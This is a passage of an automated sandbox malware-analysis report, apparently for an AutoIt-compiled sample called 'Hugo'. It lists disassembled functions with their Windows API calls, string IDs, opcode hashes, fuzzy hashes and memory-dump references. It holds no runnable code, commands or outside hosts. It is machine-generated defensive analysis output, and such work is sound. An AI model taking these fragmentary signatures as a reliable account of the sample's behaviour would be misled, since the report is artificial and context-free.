                                                                                                                                                                                                              • API ID: Window$ColorCreateMessageObjectRectSendStock
                                                                                                                                                                                                              • String ID: static
                                                                                                                                                                                                              • API String ID: 1983116058-2160076837
                                                                                                                                                                                                              • Opcode ID: 6cd5746416a11b26111a991d736bd9429f4e913ff3e7ec85ec6ccd8b144a9e28
                                                                                                                                                                                                              • Instruction ID: 308d94715b9bdfddd018b07f3df414468bb0b6b5e039333b20ffb6027c9c4e2d
                                                                                                                                                                                                              • Opcode Fuzzy Hash: 6cd5746416a11b26111a991d736bd9429f4e913ff3e7ec85ec6ccd8b144a9e28
                                                                                                                                                                                                              • Instruction Fuzzy Hash: 311137B2A10209AFDB00DFA8CC45AFA7BF8EF49364F014514FD56E3250E674E851EB60
                                                                                                                                                                                                              APIs
                                                                                                                                                                                                              • InternetOpenW.WININET(?,00000000,00000000,00000000,00000000), ref: 00F8D7C2
                                                                                                                                                                                                              • InternetSetOptionW.WININET(00000000,00000032,?,00000008), ref: 00F8D7EB
                                                                                                                                                                                                              Strings
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 0000000D.00000002.2764845634.0000000000F11000.00000020.00000001.01000000.00000007.sdmp, Offset: 00F10000, based on PE: true
                                                                                                                                                                                                              • Associated: 0000000D.00000002.2764829542.0000000000F10000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                              • Associated: 0000000D.00000002.2764895264.0000000000FAD000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                              • Associated: 0000000D.00000002.2764895264.0000000000FD3000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                              • Associated: 0000000D.00000002.2764950659.0000000000FDD000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                              • Associated: 0000000D.00000002.2764968921.0000000000FE5000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_13_2_f10000_Hugo.jbxd
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: Internet$OpenOption
                                                                                                                                                                                                              • String ID: <local>
                                                                                                                                                                                                              • API String ID: 942729171-4266983199
                                                                                                                                                                                                              • Opcode ID: 4d6b8216d127fd9921d0a95c692332c7ec6570cf5c843cced156845cb0652f13
                                                                                                                                                                                                              • Instruction ID: c91be9aff1bc606a357e37eb80fc10741462e7f9dc44af7258a4fa494b28374e
                                                                                                                                                                                                              • Opcode Fuzzy Hash: 4d6b8216d127fd9921d0a95c692332c7ec6570cf5c843cced156845cb0652f13
                                                                                                                                                                                                              • Instruction Fuzzy Hash: 6811C272605236BAD7385B668C49FEBBF9DEF127B8F10422AB509921C0D6649840E7F0
                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                • Part of subcall function 00F1B329: _wcslen.LIBCMT ref: 00F1B333
                                                                                                                                                                                                              • CharUpperBuffW.USER32(?,?,?), ref: 00F7761D
                                                                                                                                                                                                              • _wcslen.LIBCMT ref: 00F77629
                                                                                                                                                                                                              Strings
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 0000000D.00000002.2764845634.0000000000F11000.00000020.00000001.01000000.00000007.sdmp, Offset: 00F10000, based on PE: true
                                                                                                                                                                                                              • Associated: 0000000D.00000002.2764829542.0000000000F10000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                              • Associated: 0000000D.00000002.2764895264.0000000000FAD000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                              • Associated: 0000000D.00000002.2764895264.0000000000FD3000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                              • Associated: 0000000D.00000002.2764950659.0000000000FDD000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                              • Associated: 0000000D.00000002.2764968921.0000000000FE5000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_13_2_f10000_Hugo.jbxd
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: _wcslen$BuffCharUpper
                                                                                                                                                                                                              • String ID: STOP
                                                                                                                                                                                                              • API String ID: 1256254125-2411985666
                                                                                                                                                                                                              • Opcode ID: bfa13349b5eb914bda87431d7669d225388daa248427c84cba08f6592858771d
                                                                                                                                                                                                              • Instruction ID: 8d9ee71dbcbab407bfbe619a9a2f368840be361853b5578538752a7ae0901d35
                                                                                                                                                                                                              • Opcode Fuzzy Hash: bfa13349b5eb914bda87431d7669d225388daa248427c84cba08f6592858771d
                                                                                                                                                                                                              • Instruction Fuzzy Hash: B3010832A24B278BCB10BFBCCC509BF33B5AB503607004526E429D2299EB34D840F691
                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                • Part of subcall function 00F1B329: _wcslen.LIBCMT ref: 00F1B333
                                                                                                                                                                                                                • Part of subcall function 00F745FD: GetClassNameW.USER32(?,?,000000FF), ref: 00F74620
                                                                                                                                                                                                              • SendMessageW.USER32(?,000001A2,000000FF,?), ref: 00F72699
                                                                                                                                                                                                              Strings
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 0000000D.00000002.2764845634.0000000000F11000.00000020.00000001.01000000.00000007.sdmp, Offset: 00F10000, based on PE: true
                                                                                                                                                                                                              • Associated: 0000000D.00000002.2764829542.0000000000F10000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                              • Associated: 0000000D.00000002.2764895264.0000000000FAD000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                              • Associated: 0000000D.00000002.2764895264.0000000000FD3000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                              • Associated: 0000000D.00000002.2764950659.0000000000FDD000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                              • Associated: 0000000D.00000002.2764968921.0000000000FE5000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_13_2_f10000_Hugo.jbxd
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: ClassMessageNameSend_wcslen
                                                                                                                                                                                                              • String ID: ComboBox$ListBox
                                                                                                                                                                                                              • API String ID: 624084870-1403004172
                                                                                                                                                                                                              • Opcode ID: 7c0b4dafb3c0bf9feed7a91eb9f69e980656deb4ae801a58fc87bfde5c60fb7a
                                                                                                                                                                                                              • Instruction ID: 33d83d280b1608b27b7c970652bbbb47c411d18b99b16f34cae2bea97f04770a
                                                                                                                                                                                                              • Opcode Fuzzy Hash: 7c0b4dafb3c0bf9feed7a91eb9f69e980656deb4ae801a58fc87bfde5c60fb7a
                                                                                                                                                                                                              • Instruction Fuzzy Hash: E101B175A00215ABCB08ABA4CC51DFE7779EF86360B04461BA836973C1DB359809A652
                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                • Part of subcall function 00F1B329: _wcslen.LIBCMT ref: 00F1B333
                                                                                                                                                                                                                • Part of subcall function 00F745FD: GetClassNameW.USER32(?,?,000000FF), ref: 00F74620
                                                                                                                                                                                                              • SendMessageW.USER32(?,00000180,00000000,?), ref: 00F72593
                                                                                                                                                                                                              Strings
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 0000000D.00000002.2764845634.0000000000F11000.00000020.00000001.01000000.00000007.sdmp, Offset: 00F10000, based on PE: true
                                                                                                                                                                                                              • Associated: 0000000D.00000002.2764829542.0000000000F10000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                              • Associated: 0000000D.00000002.2764895264.0000000000FAD000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                              • Associated: 0000000D.00000002.2764895264.0000000000FD3000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                              • Associated: 0000000D.00000002.2764950659.0000000000FDD000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                              • Associated: 0000000D.00000002.2764968921.0000000000FE5000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_13_2_f10000_Hugo.jbxd
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: ClassMessageNameSend_wcslen
                                                                                                                                                                                                              • String ID: ComboBox$ListBox
                                                                                                                                                                                                              • API String ID: 624084870-1403004172
                                                                                                                                                                                                              • Opcode ID: 42f4d156f404ed9091675d15dd679ffb0ae5d12c31e43857bd477c70c1200f86
                                                                                                                                                                                                              • Instruction ID: ce2e53dcaec3d76be3e4c30ef39f511b8a8706f9b9e4ce40ce7fcd53269e93ab
                                                                                                                                                                                                              • Opcode Fuzzy Hash: 42f4d156f404ed9091675d15dd679ffb0ae5d12c31e43857bd477c70c1200f86
                                                                                                                                                                                                              • Instruction Fuzzy Hash: 3901A776A40105ABCB04E790CD62EFE77A9DF45340F58401B7816A32C1DF14DE08B6B3
                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                • Part of subcall function 00F1B329: _wcslen.LIBCMT ref: 00F1B333
                                                                                                                                                                                                                • Part of subcall function 00F745FD: GetClassNameW.USER32(?,?,000000FF), ref: 00F74620
                                                                                                                                                                                                              • SendMessageW.USER32(?,00000182,?,00000000), ref: 00F72615
                                                                                                                                                                                                              Strings
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 0000000D.00000002.2764845634.0000000000F11000.00000020.00000001.01000000.00000007.sdmp, Offset: 00F10000, based on PE: true
                                                                                                                                                                                                              • Associated: 0000000D.00000002.2764829542.0000000000F10000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                              • Associated: 0000000D.00000002.2764895264.0000000000FAD000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                              • Associated: 0000000D.00000002.2764895264.0000000000FD3000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                              • Associated: 0000000D.00000002.2764950659.0000000000FDD000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                              • Associated: 0000000D.00000002.2764968921.0000000000FE5000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_13_2_f10000_Hugo.jbxd
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: ClassMessageNameSend_wcslen
                                                                                                                                                                                                              • String ID: ComboBox$ListBox
                                                                                                                                                                                                              • API String ID: 624084870-1403004172
                                                                                                                                                                                                              • Opcode ID: edfce46c4aa70d08283ba1dd77da327c3ab9ab2d4c069bca6122c6e3966c8ca0
                                                                                                                                                                                                              • Instruction ID: dbac2e48aae0e3a23d62f5b7e9d2eb5336ff2c4f21a8e7662ccd5c7d13aea12d
                                                                                                                                                                                                              • Opcode Fuzzy Hash: edfce46c4aa70d08283ba1dd77da327c3ab9ab2d4c069bca6122c6e3966c8ca0
                                                                                                                                                                                                              • Instruction Fuzzy Hash: 8B01D676E40105A7CB15E7A0DD12EFF77A89F05340F54402BB816A3281DB65DE09F6B3
                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                • Part of subcall function 00F1B329: _wcslen.LIBCMT ref: 00F1B333
                                                                                                                                                                                                                • Part of subcall function 00F745FD: GetClassNameW.USER32(?,?,000000FF), ref: 00F74620
                                                                                                                                                                                                              • SendMessageW.USER32(?,0000018B,00000000,00000000), ref: 00F72720
                                                                                                                                                                                                              Strings
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 0000000D.00000002.2764845634.0000000000F11000.00000020.00000001.01000000.00000007.sdmp, Offset: 00F10000, based on PE: true
                                                                                                                                                                                                              • Associated: 0000000D.00000002.2764829542.0000000000F10000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                              • Associated: 0000000D.00000002.2764895264.0000000000FAD000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                              • Associated: 0000000D.00000002.2764895264.0000000000FD3000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                              • Associated: 0000000D.00000002.2764950659.0000000000FDD000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                              • Associated: 0000000D.00000002.2764968921.0000000000FE5000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_13_2_f10000_Hugo.jbxd
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: ClassMessageNameSend_wcslen
                                                                                                                                                                                                              • String ID: ComboBox$ListBox
                                                                                                                                                                                                              • API String ID: 624084870-1403004172
                                                                                                                                                                                                              • Opcode ID: 98546ea99934f136cebf2f8cd589a2119b5f969c5f52de1530fc6028b7797cc1
                                                                                                                                                                                                              • Instruction ID: 6f6162f35ebf68a07656ad2c2bdcb9f6c7f7fbfce614ef53282be0304d59dd50
                                                                                                                                                                                                              • Opcode Fuzzy Hash: 98546ea99934f136cebf2f8cd589a2119b5f969c5f52de1530fc6028b7797cc1
                                                                                                                                                                                                              • Instruction Fuzzy Hash: 3AF0F475A40214A6CB08A3A49C52FFE73B8AF05390F44091BB432A32C1DB649809A262
                                                                                                                                                                                                              APIs
                                                                                                                                                                                                              • MessageBoxW.USER32(00000000,Error allocating memory.,AutoIt,00000010), ref: 00F7146F
                                                                                                                                                                                                              Strings
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 0000000D.00000002.2764845634.0000000000F11000.00000020.00000001.01000000.00000007.sdmp, Offset: 00F10000, based on PE: true
                                                                                                                                                                                                              • Associated: 0000000D.00000002.2764829542.0000000000F10000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                              • Associated: 0000000D.00000002.2764895264.0000000000FAD000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                              • Associated: 0000000D.00000002.2764895264.0000000000FD3000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                              • Associated: 0000000D.00000002.2764950659.0000000000FDD000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                              • Associated: 0000000D.00000002.2764968921.0000000000FE5000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_13_2_f10000_Hugo.jbxd
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: Message
                                                                                                                                                                                                              • String ID: AutoIt$Error allocating memory.
                                                                                                                                                                                                              • API String ID: 2030045667-4017498283
                                                                                                                                                                                                              • Opcode ID: be6e44935227e0cb2a5511b94b4c40a8c0f235d59dfa82930c3a936e9ed781d5
                                                                                                                                                                                                              • Instruction ID: 303686ac52881609c889b1b01054be95d7194a321e5983ac084e4e9a15d156c5
                                                                                                                                                                                                              • Opcode Fuzzy Hash: be6e44935227e0cb2a5511b94b4c40a8c0f235d59dfa82930c3a936e9ed781d5
                                                                                                                                                                                                              • Instruction Fuzzy Hash: 5CE0487134471836D2143794AC03F8576859F0AB71F25441BF789959C38EE66490769A
                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                • Part of subcall function 00F2FAD4: InitializeCriticalSectionAndSpinCount.KERNEL32(?,00000000,?,00F310E2,?,?,?,00F1100A), ref: 00F2FAD9
                                                                                                                                                                                                              • IsDebuggerPresent.KERNEL32(?,?,?,00F1100A), ref: 00F310E6
                                                                                                                                                                                                              • OutputDebugStringW.KERNEL32(ERROR : Unable to initialize critical section in CAtlBaseModule,?,?,?,00F1100A), ref: 00F310F5
                                                                                                                                                                                                              Strings
                                                                                                                                                                                                              • ERROR : Unable to initialize critical section in CAtlBaseModule, xrefs: 00F310F0
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 0000000D.00000002.2764845634.0000000000F11000.00000020.00000001.01000000.00000007.sdmp, Offset: 00F10000, based on PE: true
                                                                                                                                                                                                              • Associated: 0000000D.00000002.2764829542.0000000000F10000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                              • Associated: 0000000D.00000002.2764895264.0000000000FAD000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                              • Associated: 0000000D.00000002.2764895264.0000000000FD3000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                              • Associated: 0000000D.00000002.2764950659.0000000000FDD000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                              • Associated: 0000000D.00000002.2764968921.0000000000FE5000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_13_2_f10000_Hugo.jbxd
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: CountCriticalDebugDebuggerInitializeOutputPresentSectionSpinString
                                                                                                                                                                                                              • String ID: ERROR : Unable to initialize critical section in CAtlBaseModule
                                                                                                                                                                                                              • API String ID: 55579361-631824599
                                                                                                                                                                                                              • Opcode ID: 69372a70860f84003ebb618d6067b0a25b9bd1ac4e71d18acd756dae9aa73900
                                                                                                                                                                                                              • Instruction ID: 1c31ce909a3b1fed8135ed04b0dd341aa3f55d061317e2b09b42bc46e68fcfd1
                                                                                                                                                                                                              • Opcode Fuzzy Hash: 69372a70860f84003ebb618d6067b0a25b9bd1ac4e71d18acd756dae9aa73900
                                                                                                                                                                                                              • Instruction Fuzzy Hash: 3EE06DB06003518BD320AF25E905382BBE8BF04350F00892DE886C2651EBB8E484EF91
                                                                                                                                                                                                              APIs
                                                                                                                                                                                                              • GetTempPathW.KERNEL32(00000104,?,00000001), ref: 00F839F0
                                                                                                                                                                                                              • GetTempFileNameW.KERNEL32(?,aut,00000000,?), ref: 00F83A05
                                                                                                                                                                                                              Strings
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 0000000D.00000002.2764845634.0000000000F11000.00000020.00000001.01000000.00000007.sdmp, Offset: 00F10000, based on PE: true
                                                                                                                                                                                                              • Associated: 0000000D.00000002.2764829542.0000000000F10000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                              • Associated: 0000000D.00000002.2764895264.0000000000FAD000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                              • Associated: 0000000D.00000002.2764895264.0000000000FD3000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                              • Associated: 0000000D.00000002.2764950659.0000000000FDD000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                              • Associated: 0000000D.00000002.2764968921.0000000000FE5000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_13_2_f10000_Hugo.jbxd
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: Temp$FileNamePath
                                                                                                                                                                                                              • String ID: aut
                                                                                                                                                                                                              • API String ID: 3285503233-3010740371
                                                                                                                                                                                                              • Opcode ID: 2faf912dd8bb8b72cacecd867aed8c5134e28bbc8037c086c0ded0f8058a21e5
                                                                                                                                                                                                              • Instruction ID: 287ebd446defd11da090a355cadd46732658823fb40d5c9fb9dbf461de58ca3b
                                                                                                                                                                                                              • Opcode Fuzzy Hash: 2faf912dd8bb8b72cacecd867aed8c5134e28bbc8037c086c0ded0f8058a21e5
                                                                                                                                                                                                              • Instruction Fuzzy Hash: A7D05EF250032867DA20A7649C0EFCB7AACDB45710F0002A1BA66960A1EAB4DA85CB90
                                                                                                                                                                                                              APIs
                                                                                                                                                                                                              • FindWindowW.USER32(Shell_TrayWnd,00000000), ref: 00FA2E08
                                                                                                                                                                                                              • PostMessageW.USER32(00000000), ref: 00FA2E0F
                                                                                                                                                                                                                • Part of subcall function 00F7F292: Sleep.KERNEL32 ref: 00F7F30A
                                                                                                                                                                                                              Strings
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 0000000D.00000002.2764845634.0000000000F11000.00000020.00000001.01000000.00000007.sdmp, Offset: 00F10000, based on PE: true
                                                                                                                                                                                                              • Associated: 0000000D.00000002.2764829542.0000000000F10000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                              • Associated: 0000000D.00000002.2764895264.0000000000FAD000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                              • Associated: 0000000D.00000002.2764895264.0000000000FD3000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                              • Associated: 0000000D.00000002.2764950659.0000000000FDD000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                              • Associated: 0000000D.00000002.2764968921.0000000000FE5000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_13_2_f10000_Hugo.jbxd
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: FindMessagePostSleepWindow
                                                                                                                                                                                                              • String ID: Shell_TrayWnd
                                                                                                                                                                                                              • API String ID: 529655941-2988720461
                                                                                                                                                                                                              • Opcode ID: 238018a92d657debfe229faebbe7ae1a070a323bf0b05cf8409813e60482b080
                                                                                                                                                                                                              • Instruction ID: eb52afb6d3b61127f3d4f9bf9888e5c9468f742255779a62b07cd0ee3058615a
                                                                                                                                                                                                              • Opcode Fuzzy Hash: 238018a92d657debfe229faebbe7ae1a070a323bf0b05cf8409813e60482b080
                                                                                                                                                                                                              • Instruction Fuzzy Hash: 6ED022353C13047BF328F330AC0FFC23B109B01B00F104822B30AAA2C0C8E0A800D684
                                                                                                                                                                                                              APIs
                                                                                                                                                                                                              • FindWindowW.USER32(Shell_TrayWnd,00000000), ref: 00FA2DC8
                                                                                                                                                                                                              • PostMessageW.USER32(00000000,00000111,00000197,00000000), ref: 00FA2DDB
                                                                                                                                                                                                                • Part of subcall function 00F7F292: Sleep.KERNEL32 ref: 00F7F30A
                                                                                                                                                                                                              Strings
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 0000000D.00000002.2764845634.0000000000F11000.00000020.00000001.01000000.00000007.sdmp, Offset: 00F10000, based on PE: true
                                                                                                                                                                                                              • Associated: 0000000D.00000002.2764829542.0000000000F10000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                              • Associated: 0000000D.00000002.2764895264.0000000000FAD000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                              • Associated: 0000000D.00000002.2764895264.0000000000FD3000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                              • Associated: 0000000D.00000002.2764950659.0000000000FDD000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                              • Associated: 0000000D.00000002.2764968921.0000000000FE5000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_13_2_f10000_Hugo.jbxd
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: FindMessagePostSleepWindow
                                                                                                                                                                                                              • String ID: Shell_TrayWnd
                                                                                                                                                                                                              • API String ID: 529655941-2988720461
                                                                                                                                                                                                              • Opcode ID: 14f730140ee241ec9f9363cabe7fc0cdd22a7cef193be11d2944437089205ec5
                                                                                                                                                                                                              • Instruction ID: 54f3890a82d6101bdd4af77b05a53fb516ff977c34c6e0a15d39d9ca345ac330
                                                                                                                                                                                                              • Opcode Fuzzy Hash: 14f730140ee241ec9f9363cabe7fc0cdd22a7cef193be11d2944437089205ec5
                                                                                                                                                                                                              • Instruction Fuzzy Hash: 59D02239384304BBE328F330AC0FFD23B109F00B00F104822B30AAA2C0C8E0A800D680
                                                                                                                                                                                                              APIs
                                                                                                                                                                                                              • MultiByteToWideChar.KERNEL32(?,00000009,?,00000000,00000000,?,?,?,00000000,?,?,?,?,?,00000000,?), ref: 00F4C213
                                                                                                                                                                                                              • GetLastError.KERNEL32 ref: 00F4C221
                                                                                                                                                                                                              • MultiByteToWideChar.KERNEL32(?,00000001,?,?,00000000,?), ref: 00F4C27C
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 0000000D.00000002.2764845634.0000000000F11000.00000020.00000001.01000000.00000007.sdmp, Offset: 00F10000, based on PE: true
                                                                                                                                                                                                              • Associated: 0000000D.00000002.2764829542.0000000000F10000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                              • Associated: 0000000D.00000002.2764895264.0000000000FAD000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                              • Associated: 0000000D.00000002.2764895264.0000000000FD3000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                              • Associated: 0000000D.00000002.2764950659.0000000000FDD000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                              • Associated: 0000000D.00000002.2764968921.0000000000FE5000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_13_2_f10000_Hugo.jbxd
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: ByteCharMultiWide$ErrorLast
                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                              • API String ID: 1717984340-0
                                                                                                                                                                                                              • Opcode ID: 7b199de2f989debcc4a4022b4ed0b102ff98f00a7cfabb0fa2c19a652ff94001
                                                                                                                                                                                                              • Instruction ID: 13248204af1a8f994db5435fb286a4db049689d033664cf5a154c6532e04440e
                                                                                                                                                                                                              • Opcode Fuzzy Hash: 7b199de2f989debcc4a4022b4ed0b102ff98f00a7cfabb0fa2c19a652ff94001
                                                                                                                                                                                                              • Instruction Fuzzy Hash: 8D41F831A01205AFDB618FE5C844BAA7FA5EF51330F245169FC559B1A1DBF09E00EBA0